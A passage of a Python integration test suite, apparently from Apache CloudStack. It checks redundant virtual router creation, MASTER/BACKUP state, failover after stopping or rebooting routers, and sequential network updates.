def test_createRvRNetwork(self):
"""Test create network with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (MASTER or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Redundant states: %s, %s" % (
master_router.redundantstate,
backup_router.redundantstate
))
self.assertEqual(
master_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(MASTER & BACKUP)"
)
self.assertEqual(
master_router.redundantstate,
"MASTER",
"Redundant state of router should be MASTER"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
master_router.guestipaddress,
backup_router.guestipaddress,
"Both (MASTER & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
master_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (MASTER & BACKUP) routers should not have same guestMAC"
)
return
class TestCreateRvRNetworkNonDefaultGuestCidr(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkNonDefaultGuestCidr,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_createRvRNetwork(self):
"""Test create network with non-default guest cidr with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# - gw = 192.168.2.1 and cidr = 192.168.2.0/23
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (MASTER or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id,
netmask='255.255.254.0',
gateway='192.168.2.1'
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.assertEqual(
nw_response.gateway,
'192.168.2.1',
"The gateway should be 192.168.2.1"
)
self.assertEqual(
nw_response.cidr,
'192.168.2.0/23',
"Guest cidr should be 192.168.2.0/23 but is %s" % nw_response.cidr
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.assertEqual(
master_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(MASTER & BACKUP)"
)
self.assertEqual(
master_router.redundantstate,
"MASTER",
"Redundant state of router should be MASTER"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
master_router.guestipaddress,
backup_router.guestipaddress,
"Both (MASTER & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
master_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (MASTER & BACKUP) routers should not have same guestMAC"
)
return
class TestRVRInternals(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRVRInternals, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.hypervisor = self.testClient.getHypervisorInfo()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_redundantVR_internals(self):
"""Test redundant router internals
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# 2. listRouters in above network
# 3. deployVM in above user account in the created network
# 4. login to both Redundant Routers
# 5. login to user VM
# 6. delete user account
# Validate the following:
# 1. listNetworks lists network in Allocated state
# 2. listRouters lists no routers created yet
# 3. listRouters returns Master and Backup routers
# 4. ssh in to both routers and verify:
# - MASTER router has eth2 with public Ip address
# - BACKUP router has only guest eth0 and link local eth1
# - Broadcast on MASTER eth2 is non-zero (0.0.0.0)
# - execute checkrouter.sh in router home and check if it is status
# "MASTER|BACKUP" as returned by the listRouters API
# 5. DNS of the user VM is set to RedundantRouter Gateway
# (/etc/resolv.conf)
# Check that the default gateway for the guest is the rvr gateway
# and not the guestIp of either of the RvRs
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Fetching the host details for double hop into router")
hosts = Host.list(
self.apiclient,
id=master_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
master_host = hosts[0]
self.debug("Host for master router: %s" % master_host.name)
self.debug("Host for master router: %s" % master_host.ipaddress)
hosts = Host.list(
self.apiclient,
id=backup_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
backup_host = hosts[0]
self.debug("Host for backup router: %s" % backup_host.name)
self.debug("Host for backup router: %s" % backup_host.ipaddress)
self.debug(master_router.linklocalip)
# Check eth2 port for master router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
master_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
master_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
master_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.debug("Router's public Ip: %s" % master_router.publicip)
self.assertEqual(
res.count("state UP"),
1,
"MASTER router's public interface should be UP"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
# Check eth2 port for backup router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
backup_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
backup_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
backup_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.assertEqual(
res.count("state DOWN"),
1,
"BACKUP router's public interface should be DOWN"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
vms = VirtualMachine.list(
self.apiclient,
id=virtual_machine.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List VMs should not return empty response"
)
vm = vms[0]
self.assertNotEqual(
vm.nic[0].gateway,
master_router.publicip,
"The gateway of user VM should be same as master router"
)
self.assertNotEqual(
vm.nic[0].gateway,
backup_router.publicip,
"The gateway of user VM should be same as backup router"
)
return
class TestRvRRedundancy(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRvRRedundancy, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls.network_offering_for_update=NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering_for_update)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls.network_offering_for_update.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.insert(0, self.account)
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_01_stopMasterRvR(self):
"""Test stop master RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. stopRouter that is Master. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old MASTER
# router in redundantstate=UNKNOWN, and the old BACKUP router as
# new MASTER
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT MASTER, should have only one BACKUP and one MASTER
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the MASTER router")
try:
Router.stop(self.apiclient, id=master_router.id)
except Exception as e:
self.fail("Failed to stop master router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
id=master_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the master router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'MASTER',
"Redundant state of the router should be MASTER but is %s" %
routers[0].redundantstate)
self.debug("Starting the old MASTER router")
try:
Router.start(self.apiclient, id=master_router.id)
self.debug("old MASTER router started")
except Exception as e:
self.fail("Failed to start master router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the master router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=master_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
master_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_02_stopBackupRvR(self):
"""Test stop backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. stopRouter that is BACKUP. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old MASTER
# router in redundantstate=UNKNOWN
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT MASTER, should have only one BACKUP and one MASTER
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the BACKUP router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop backup router: %s" % e)
# wait for VR update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the master router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=master_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'MASTER',
"Redundant state of the router should be MASTER but is %s" %
routers[0].redundantstate)
self.debug("Starting the old BACKUP router")
try:
Router.start(self.apiclient, id=backup_router.id)
self.debug("old BACKUP router started")
except Exception as e:
self.fail("Failed to stop master router: %s" % e)
# wait for VR to start and update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
backup_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_03_rebootMasterRvR(self):
"""Test reboot master RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. reboot router that is MASTER. Router reboots state
# successfully
# 6. lists old MASTER router in redundantstate=BACKUP and the old
# BACKUP router as new MASTER + public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the master router")
try:
Router.reboot(self.apiclient, id=master_router.id)
except Exception as e:
self.fail("Failed to reboot MASTER router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the master router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=master_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'MASTER',
"Redundant state of the router should be MASTER but is %s" %
routers[0].redundantstate)
self.assertEqual(
master_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_04_rebootBackupRvR(self):
"""Test reboot backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. reboot router that is BACKUP. Router reboots state
# successfully
# 6. lists old BACKUP router in redundantstate=BACKUP, and the old
# MASTER router is still MASTER+ public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the backup router")
try:
Router.reboot(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to reboot BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the master router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=master_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'MASTER',
"Redundant state of the router should be MASTER but is %s" %
routers[0].redundantstate)
self.assertEqual(
master_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_05_stopBackupRvR_startInstance(self):
"""Test stop backup RVR and start instance
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. stop router that is BACKUP.
# 6. listRouters in the account and in the network
# 7. deployVM in the user account in the created network
# 8. listRouters in the account and in the network
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
backup_router = routers[1]
else:
backup_router = routers[0]
self.debug("Stopping the backup router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertIn(
routers[0].redundantstate,
'UNKNOWN',
"Redundant state of the backup router\
should be UNKNOWN but is %s" %
routers[0].redundantstate)
# Spawn an instance in that network
vm_2 = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
vms = VirtualMachine.list(
self.apiclient,
id=vm_2.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List Vms should return a valid list"
)
vm = vms[0]
self.assertEqual(
vm.state,
"Running",
"Vm should be in running state after deployment"
)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
return
def updateNetwork(self, conn):
try:
self.network.update(
self.api_client,
networkofferingid=self.network_offering_for_update.id,
updateinsequence=True,
forced=True,
changecidr=False
)
except Exception as e:
conn.send("Failed to update network: %s due to %s"%(self.network.name, e))
conn.send("update Network Complete")
return
def get_master_and_backupRouter(self):
retry = 4
master_router = backup_router=None
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
if not (routers[0].redundantstate == 'MASTER' or routers[1].redundantstate == 'MASTER'):
continue;
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
break
else:
master_router = routers[1]
backup_router = routers[0]
break
return master_router, backup_router
def chek_for_new_backupRouter(self,old_backup_router):
master_router, backup_router = self.get_master_and_backupRouter()
retry = 4
self.info("Checking if new router is getting created.")
self.info("old_backup_router:"+old_backup_router.name+" new_backup_router:"+backup_router.name)
while old_backup_router.name == backup_router.name:
self.debug("waiting for new router old router:"+backup_router.name)
retry = retry-1
if retry == 0:
break;
time.sleep(self.testdata["sleep"])
master_router, backup_router = self.get_master_and_backupRouter()
if retry == 0:
self.fail("New router creation taking too long, timed out")
def wait_untill_router_stabilises(self):
retry=4
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
self.info("waiting untill state of the routers is stable")
if routers[0].redundantstate != 'UNKNOWN' and routers[1].redundantstate != 'UNKNOWN':
return
elif retry==0:
self.fail("timedout while waiting for routers to stabilise")
return
time.sleep(self.testdata["sleep"])
@attr(tags=["bharat"])
def test_06_updateVRs_in_sequence(self):
"""Test update network and check if VRs are updated in sequence
"""
# Steps to validate
# update network to a new offering
# check if the master router is running while backup is starting.
# check if the backup is running while master is starting.
# check if both the routers are running after the update is complete.
#clean up the network to make sure it is in proper state.
self.network.restart(self.apiclient,cleanup=True)
time.sleep(self.testdata["sleep"])
self.wait_untill_router_stabilises()
old_master_router, old_backup_router = self.get_master_and_backupRouter()
self.info("old_master_router:"+old_master_router.name+" old_backup_router"+old_backup_router.name)
#chek if the network is in correct state
self.assertEqual(old_master_router.state, "Running", "The master router is not running, network is not in a correct state to start the test")
self.assertEqual(old_backup_router.state, "Running", "The backup router is not running, network is not in a correct state to start the test")
worker, monitor = multiprocessing.Pipe()
worker_process = multiprocessing.Process(target=self.updateNetwork, args=(worker,))
worker_process.start()
if not worker_process.is_alive():
message = monitor.recv()
